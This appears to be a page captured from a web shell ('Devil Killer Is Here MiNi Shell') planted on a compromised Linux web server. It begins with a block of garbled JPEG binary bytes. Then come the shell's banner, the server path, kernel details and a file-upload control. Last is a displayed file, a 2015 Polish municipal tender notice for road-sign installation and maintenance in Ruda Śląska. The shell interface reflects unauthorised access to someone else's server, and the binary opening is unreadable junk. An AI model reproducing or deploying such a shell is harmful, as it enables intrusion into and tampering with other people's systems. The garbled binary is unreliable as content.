JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150911/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150911/134631-N-2015.html

<p class="kh_header"><b>Ruda Śląska: Bieżące zabezpieczenie ruchu sieci drogowej miasta Ruda Śląska</b><br>
<b>Numer ogłoszenia: 134631 - 2015; data zamieszczenia: 11.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Ruda Śląska , Plac Jana Pawła II 6, 41-709 Ruda Śląska, woj. śląskie, tel. 032 2486281 do 9; 2449094, faks 032 248 7348.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rudaslaska.bip.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżące zabezpieczenie ruchu sieci drogowej miasta Ruda Śląska.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Bieżące zabezpieczenie ruchu sieci drogowej miasta Ruda Śląska.
Zakres prac obejmuje:

1. dostawa i montaż oznakowania pionowego oraz zabezpieczenie pasa drogowego
Zakres zamówienia obejmuje obszar sieci drogowej na terenie miasta Ruda Śląska.
Zadanie nr 1:
-od północy granicą administracyjną miasta, a od południa Drogową Trasą Średnicową (wraz z DTŚ).
Zadanie nr 2:
-od północy Drogową Trasą Średnicową, a od południa linią towarowej magistrali kolejowej.
Zadanie nr 3:
-od północy linią towarowej magistrali kolejowej, a od południa granicą administracyjną miasta.
2. Utrzymanie i konserwacja oznakowania i urządzeń bezpieczeństwa ruchu.
Zakres zamówienia obejmuje obszar sieci drogowej na terenie miasta Ruda Śląska.
Zadanie nr 4:
-od północy granicą administracyjną miasta, a od południa śladem Drogowej Trasy Średnicowej (wraz z DTŚ) - ilość ~ 2.300 sztuk znaków drogowych.
Zadanie nr 5:
-od północy śladem Drogowej Trasy Średnicowej, a od południa linią towarowej magistrali kolejowej - ilość ~ 3.500 sztuk znaków drogowych.
Zadanie nr 6:
-od północy linią towarowej magistrali kolejowej, a od  południa granicą administracyjną miasta  - ilość ~ 2.300 sztuk znaków drogowych.
Szczegółowy opis przedmiotu zamówienia zawiera SIWZ.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.31.62.13-1, 45.23.32.80-5, 45.23.32.90-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2018.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Oferta musi być zabezpieczona wadium w wysokości: 
Zadanie nr 1:    13 000,00 zł (trzynaście tysięcy złotych),
Zadanie nr 2:    15 000,00 zł (piętnaście tysięcy złotych),
Zadanie nr 3:    12 000,00 zł (dwanaście tysięcy złotych), 
Zadanie nr 4:      6 000,00 zł (sześć tysięcy złotych),
Zadanie nr 5:      9 000,00 zł (dziewięć tysięcy złotych),
Zadanie nr 6:      6 000,00 zł (sześć tysięcy złotych). 
1.1.		Wadium może być wniesione w:
-	pieniądzu,
-	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
-	gwarancjach bankowych,
-	gwarancjach ubezpieczeniowych,
-	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 Nr 42, poz. 275 z późniejszymi zmianami). 
2.Wadium wnoszone w pieniądzu należy wpłacać przelewem na następujący nr konta: ING Bank Śląski S.A. Oddział Ruda Śląska nr: 71105012141000001001090628
Uwaga : Wadium w tej formie uważa się za wniesione w sposób prawidłowy, gdy środki pieniężne wpłyną na konto Zamawiającego przed upływem terminu składnia ofert.
2.1.	Wadium wnoszone w postaci niepieniężnej należy złożyć w oryginalnym egzemplarzu bezpośrednio do oferty. Zaleca się zamieścić dokument wadialny w taki sposób, aby jego zwrot przez Zamawiającego nie naruszył integralności oferty i dołączonych oświadczeń wraz z dokumentami (np. umieszczony w koszulce, co pozwoli na swobodne oddzielenie wadium od reszty dokumentów).
2.2.	Zamawiający zwróci wniesione wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, z zastrzeżeniem pkt 2.7. lit. a niniejszego rozdziału SIWZ.
2.3.	Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, Zamawiający zwróci wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy. 
2.4.	Zamawiający zwróci niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
2.5.	Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium zgodnie z zapisem pkt 2.2. niniejszego rozdziału SIWZ, jeżeli w wyniku rozstrzygnięcia odwołania, jego oferta zostanie wybrana jako najkorzystniejsza. Wykonawca ten wnosi wadium w terminie określonym przez Zamawiającego.
2.6. Wykonawca, którego oferta została wybrana, a który wniósł wadium w pieniądzu, może wyrazić zgodę na zaliczenie kwoty wadium na poczet zabezpieczenia należytego wykonania umowy.
2.7.	Zamawiający zatrzyma wadium wraz z odsetkami:
a) jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, z przyczyn leżących po jego stronie, nie złoży dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyrazi zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej;
b) jeżeli Wykonawca, którego oferta została wybrana:
- odmówi podpisania umowy na warunkach określonych w ofercie, 
- nie wniesie zabezpieczenia należytego wykonania umowy na zasadach określonych w specyfikacji istotnych warunków zamówienia,
- zawarcie umowy w sprawie niniejszego zamówienia stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie, zgodnie ze sztuką budowlaną oraz prawidłowo ukończył:
  dla I.  grupy  -  zadania nr 1, 2, 3
tj. na - Dostawę i montaż oznakowania pionowego oraz zabezpieczenie pasa drogowego. 
- dla jednego z wybranych zadań/części tej grupy - co najmniej jedną robotę polegającą na bieżącej dostawie i montażu oznakowania pionowego dróg publicznych na kwotę minimum 600.000,00 zł brutto oraz jedną robotę polegającą na zabezpieczeniu pasa dróg publicznych na kwotę minimum  40.000,00 zł brutto.  
W przypadku składania oferty na dwa zadania/część z tej grupy należy wykazać się odpowiednio większym doświadczeniem - dwie roboty polegające na bieżącej dostawie i montażu oznakowania pionowego dróg publicznych na łączną kwotę minimum 1.000.000,- zł brutto oraz dwie roboty polegające na zabezpieczeniu pasa dróg publicznych na łączną kwotę minimum  80.000,00 zł brutto.  
Wykonawca  może złożyć ofertę tylko na dwa wybrane zadanie. 
  dla II.  grupy  -  zadania nr 4, 5, 6
tj. na  - Utrzymanie i konserwację oznakowania oraz urządzeń bezpieczeństwa ruchu.  
- dla jednego z wybranych zadań-części tej grupy - co najmniej jedną robotę polegającą na bieżącym utrzymaniu i konserwacji oznakowania i urządzeń bezpieczeństwa ruchu na drogach publicznych na kwotę minimum 600.000,-zł. brutto. 
W przypadku składania oferty na więcej niż jedno zadanie-część z tej grupy należy wykazać się odpowiednio większym doświadczeniem, tj. 
- dwoma robotami jak wyżej na łączną kwotę  1.000.000,- zł. brutto (na dwa zadania),  
- oraz trzema robotami jak wyżej na łączną kwotę 1.400.000,- zł. brutto (na trzy zadania).
Pod pojęciem: 
- dostawa i montaż oznakowania pionowego oraz zabezpieczenie pasa dróg publicznych należy rozumieć wykonywanie stałych usług co najmniej rocznych dla zarządcy drogi - montaż, wymiana znaków i słupków oraz szeroko rozumiane zabezpieczenie pasa drogowego (imprezy  i miejsca niebezpieczne) mających na celu utrzymanie bezpieczeństwa ruchu drogowego na odpowiednim poziome na terenie miasta; 
- utrzymanie i konserwacja oznakowania i urządzeń bezpieczeństwa ruchu należy rozumieć wykonywanie stałych usług co najmniej rocznych dla zarządcy drogi - m.in. mycie i prostowanie znaków pionowych i urządzeń brd, malowanie słupków i urządzeń brd oraz codzienny udokumentowany przegląd oznakowania w terenie mający na celu utrzymanie bezpieczeństwa ruchu drogowego na odpowiednim poziome na terenie miasta.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać dysponowanie (dysponuje lub będzie dysponował) odpowiednim   potencjałem technicznym w celu realizacji zamówienia tj. przynajmniej:
dla I.  grupy  -   zadania nr 1, 2, 3
tj.: na - Dostawę i montaż oznakowania pionowego oraz zabezpieczenie pasa drogowego. 
- dla jednego z wybranych zadań z tej grupy:
- 1 kompletem znaków do zabezpieczenia miejsc w pasie drogowym (rozdział IV pkt. 1.8 STWiOR), 
- 2 urządzeniami napinającymi taśmy montażowe ze stali nierdzewnej, 
- 1 agregatem prądotwórczym,
- 1 aparatem spawalniczym, 
- 1 młotem pneumatycznym, 
- 1 samochodem dostawczym, 
- 1 samochodem ciężarowym, 
- 1 samochodem osobowym.
- dla dwóch z wybranych zadań z tej grupy - suma wymaganej ilości sprzętu.
dla II.  grupy  -  zadania nr 4, 5, 6
tj.: na - Utrzymanie i konserwację oznakowania oraz urządzeń bezpieczeństwa ruchu. 
- dla jednego z wybranych zadań z tej grupy przynajmniej:
- 2 urządzeniami napinającymi taśmy montażowe ze stali nierdzewnej, 
- 1 myjką ciśnieniową, 
- 1 agregatem prądotwórczym, 
- 1 aparatem spawalniczym, 
- 1 młotem pneumatycznym, 
- 1 samochodem dostawczym, 
- 1 samochodem ciężarowym, 
- 1 samochodem osobowym.
W przypadku złożenia przez Wykonawcę oferty na więcej niż jedno zadanie z tej grupy (dwa lub trzy zadania) należy wykazać, iż dysponuje przynajmniej następującymi narzędziami  i urządzeniami:
- 3 urządzeniami napinającymi taśmy montażowe ze stali nierdzewnej, 
- 2 myjkami ciśnieniowymi, 
- 2 agregatami prądotwórczymi, 
- 1 aparatem spawalniczym, 
- 2 młotami pneumatycznymi, 
- 3 samochodami dostawczymi, 
- 1 samochodem ciężarowym, 
- 1 samochodem osobowym.
W przypadku złożenia przez Wykonawcę oferty na zadanie/a z grupy I oraz na więcej niż jedno zadanie z grupy II  należy wykazać, iż dysponuje przynajmniej następującymi narzędziami  i urządzeniami:
- 1 kompletem znaków do zabezpieczenia miejsc w pasie drogowym (rozdział IV pkt. 1.8 STWiOR), 
- 5 urządzeniami napinającymi taśmy montażowe ze stali nierdzewnej, 
- 2 myjkami ciśnieniowymi, 
- 3 agregatami prądotwórczymi,
- 2 aparatami spawalniczymi, 
- 3 młotami pneumatycznymi, 
- 4 samochodami dostawczymi,
- 2 samochodami ciężarowymi, 
- 1 samochodem osobowym.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać dysponowanie (dysponuje lub będzie dysponował) osobami  zdolnymi do wykonania zamówienia tj. posiadającą prawo do wykonywania samodzielnych funkcji technicznych w budownictwie tj. odpowiednio:  
  dla I.  grupy  -  zadania nr 1, 2, 3
tj. na - Dostawę i montaż oznakowania pionowego oraz zabezpieczenie pasa drogowego. 
- dla jednego z wybranych zadań z tej grupy:
- jedną osobą posiadającą potwierdzone przygotowanie zawodowe do wykonywania samodzielnych funkcji technicznych w budownictwie w specjalności konstrukcyjno-budowlanej
 lub	odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów
oraz	zrzeszoną we właściwym samorządzie zawodowym zgodnie z przepisami ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów, inżynierów budowlanych oraz urbanistów (Dz. U. z 2013 r. poz. 932 z późn. zm.).
lub	spełniającą warunki, o których mowa w art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2013 r. poz. 1409 z późniejszymi zmianami) tj. osobą której odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych lub spełniającą wymogi o których mowa w art. 20a ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (świadczenie usług transgranicznych).
- minimum 4 osobami, z których przynajmniej 2 posiadają prawo jazdy (z tego min. jedna z kat. C). Wszystkie osoby winny posiadać aktualne zaświadczenie wydane przez Dyrektora Wojewódzkiego Ośrodka Ruchu Drogowego (WORD) o ukończeniu szkolenia z zakresu wykonywania niektórych czynności związanych z kierowaniem ruchem drogowym.  W przypadku złożenia oferty na dwa zadania - min. 8 osób, w tym 4 posiadające prawo jazdy (dwa kat. C).

dla II.  grupy  -  zadania nr 4, 5, 6
tj. na - Utrzymanie i konserwację oznakowania oraz urządzeń bezpieczeństwa ruchu.  
- dla jednego z wybranych zadań z tej grupy:
- minimum 4 osobami, z których przynajmniej 2 posiadają prawo jazdy (z tego min. jedna z kat. C).
W przypadku złożenia przez Wykonawcę oferty na zadanie/a z grupy I oraz więcej niż jedno zadanie z grupy II, należy wykazać, iż dysponuje łączną liczbą osób będącą sumą wymaganej liczby osób do realizacji poszczególnych zadań - wyjątek stanowi osoba z uprawnieniami budowlanymi tzn. może to być jedna osoba na jedno i więcej zadań. (np. składając ofertę na cztery zadania należy wykazać minimum 16 osoby z czego 8 posiada prawo jazdy (z tego min. cztery z kat. C), 4 osoby winny posiadać aktualne zaświadczenie wydane przez Dyrektora WORD o ukończeniu szkolenia z zakresu wykonywania niektórych czynności związanych z kierowaniem ruchem drogowym. + jedna osoba z uprawnieniami budowlanymi).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">do oferty należy dołączyć tabliczkę z nazwą ulicy wraz z tuleją z profilem wzmacniającym zgodnie z opisem zawartym  w opisie przedmiotu zamówienia i specyfikacji technicznej wykonania i odbioru robót (zał. 8 i 8a do SIWZ)</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.W zakresie warunków udziału w postępowaniu opisanych w pkt 2.2 do 2.4. (opis sposobu dokonania oceny spełniania warunków) rozdziału XII SIWZ, Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonywania zamówienia. Zobowiązanie takie należy złożyć w oryginale lub kopii potwierdzonej za zgodność z oryginałem notarialnie lub kopii poświadczonej za zgodność z oryginałem przez podmiot udostępniający zasoby. Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, może żądać dokumentów dotyczących szczególności: a) zakresu dostępnych Wykonawcy zasobów innego podmiotu, b) sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia, c) charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem, d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. Zamawiający zażąda w/w dokumentów w przypadku gdy wykonawca nie udowodni w wystarczający sposób dysponowania zasobami innego podmiotu niezbędnymi do należytego wykonania zamówienia. Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art.26 ust. 2b ustawy, odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy. 2. Oświadczenie, że wykonawca zapoznał się z warunkami zamówienia i złożonym wzorem umowy oraz, że przyjmuje ich treść bez żadnych zastrzeżeń. 3. Pełnomocnictwo ustanowione do reprezentowania wykonawcy/ów ubiegających się o udzielenie zamówienia publicznego. Pełnomocnictwo należy składać oryginale bądź kopii, potwierdzonej za zgodność z oryginałem notarialnie. 4. W przypadku wniesienia wadium w postaci pieniężnej, zalecane jest dołączenie do oferty kopii potwierdzenia nadania przelewu. 5.W przypadku wniesienia wadium w postaci niepieniężnej, należy dołączyć do oferty oryginał dokumentu potwierdzającego wniesienie wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - Aspekt środowiskowy - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
